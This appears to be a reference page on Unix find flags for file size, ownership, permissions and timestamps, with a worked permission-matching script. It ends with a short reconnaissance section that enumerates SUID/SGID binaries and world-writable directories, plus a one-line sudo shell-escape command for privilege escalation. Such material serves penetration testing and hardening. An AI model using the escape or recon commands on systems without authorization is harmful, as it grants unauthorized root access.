Basics

Some useful find flags related to file metadata.

Ownership

The -user and -group flags match files and folders owned by a particular user or group (both numeric IDs and symbolic names are allowed).

File size

The -size flag matches files of size n.

Prefix n with + or - to match files strictly greater than or less than n in size. To specify useful sizes, use a suffix.

  • c — Bytes
  • k — Kilobytes
  • M — Megabytes
  • G — Gigabytes

For example, use -size +4G to find files over 4 GB (i.e., those that can’t be written to a FAT32 file system).

Permissions

The -perm flag matches files and folders with a given permission. Both numeric and symbolic permissions are allowed.

Use the / or - prefix to match files with any of the specified permissions or at least the specified permissions, respectively. For example, -perm -644 will match any file where the owner has at least read + write access and the group and everyone else have at least read access (so, - requires all of the specified permission bits, but is agnostic as to the presence/absence of additional permissions). Likewise, -perm /666 will match files where the owner, the group, or everyone else has read or write access (so, / requires that at least one of the specified permission bits is set, but is agnostic to the state of every other bit).
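The three forms of -perm (exact, - and /) compared side by side, as an added example that is not part of the original page. It builds constructed files named after their own modes in a temporary directory; the function names make_fixture and perm_matches are made up for this illustration.

```shell
#!/bin/sh
# Added example: compare exact, "-" (all bits) and "/" (any bit) matching
# on constructed files whose names are their octal modes.

# make_fixture DIR: create one empty file per mode, named after the mode.
make_fixture() {
    for mode in 400 600 640 644 664 666 755; do
        : > "$1/$mode"
        chmod "$mode" "$1/$mode"
    done
}

# perm_matches DIR PERM_ARG: print the matching file names on one line,
# sorted and separated by spaces.
perm_matches() {
    find "$1" -type f -perm "$2" | sed 's|.*/||' | sort | paste -sd' ' -
}

demo_dir=$(mktemp -d)
make_fixture "$demo_dir"

# Exact: the mode must be 644 and nothing else.
echo "644  : $(perm_matches "$demo_dir" 644)"

# "-": every bit of 644 must be set; extra bits (as in 664 or 755) are fine.
echo "-644 : $(perm_matches "$demo_dir" -644)"

# "/": at least one of the listed bits (group write, other write) is set.
echo "/022 : $(perm_matches "$demo_dir" /022)"

# "/666": any read or write bit for anyone, so even mode 400 matches.
echo "/666 : $(perm_matches "$demo_dir" /666)"

rm -rf "$demo_dir"
```

When auditing for files that someone other than the owner can modify, /022 is the form to use; -022 would miss files that are group-writable but not world-writable.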

Timestamps

The -Xmin and -Xtime flags, where X is a, m or c, match files that were accessed (a), had their contents modified (m), or had their inode changed (c) n minutes (-Xmin) or days (-Xtime) ago.

All mtime changes are ctime changes, but the reverse is not necessarily true.

Prefix n with + or - to match files strictly before or after the specified time in the past.

For example:

# Matches files accessed *more* than 30 minutes ago
#
find . -type f -amin +30
 
# Matches files modified *less* than 7 days ago
#
find . -type f -mtime -7
 
# Matches files modified in the *last 24 hours*
# (put -daystart before -mtime to count from midnight, i.e. *today*)
#
find . -type f -mtime 0

Reconnaissance

Find SUID and SGID executables

find / -type f \
       -a \( -perm -u+s -o -perm -g+s \) \
       -exec ls -l {} \; 2> /dev/null

Find folders that are both world-writable and world-executable

find / -type d -a \( -perm -o+w -perm -o+x \) 2>/dev/null

Shell escape

If find can be run with NOPASSWD via sudo, then try:

sudo find . -exec /bin/sh \; -quit